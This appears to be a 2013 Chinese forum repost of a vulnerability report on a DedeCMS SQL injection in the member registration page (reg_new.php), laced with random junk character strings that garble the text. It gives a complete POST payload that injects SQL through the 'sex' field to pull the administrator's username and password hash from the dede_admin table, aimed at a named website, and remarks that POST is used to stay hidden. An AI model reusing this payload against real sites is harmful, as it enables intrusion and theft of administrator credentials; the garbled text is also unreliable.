漏洞类型: SQL注射漏洞
9 V1 I6 e( m. D% R% R简要描述:
4 ~/ c- Y5 ?4 h. n- \7 R
. U8 e1 Y% C% R0 E: g2 j6 l$ a! e需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.6 l8 {1 a8 {7 F+ z7 H
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
# \& ~: i8 U; |/ L! C/ ]- K! ?9 U6 @详细说明:跟这个漏洞
8 Y8 I+ y6 N1 A1 y& m3 f $ y5 L$ Q3 M$ E( j) h) ?
WooYun: Dedecms SQL注射导致审核机制绕过漏洞
3 ~1 V: p0 z( W" N; w) p/ H D0 B是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.0 `% D/ A3 W. Q: {2 O6 W
POST提交以下数据,其实不用POST提交的,这样隐蔽点.& C" [/ p! B \* V
0 k6 q, w& m. i- o7 S7 Kwww.political-security.com/member/reg_new.php8 d9 B+ Q( ?6 B4 v9 L% H) O
" R. Y: I# k! L( u; @) G7 z: ^( _
POST8 [! j, r$ M% t) f n
' W% r4 m' G1 j) bdopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&; P1 H- R1 M; A& E" T
userid=c4rp3nt3r&uname=c4rp3nt3r. R* t$ R2 Y0 e- ?! _5 N0 V
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss2 |& f9 C. e$ `2 W, Y# F
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`, _6 y4 \1 j/ |" Z; Y9 ?
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
w% k' i4 `. _" {6 I! n%00&vdcode=glos&agree= |
发表于 2013-1-19 08:25:02
收藏
支持
反对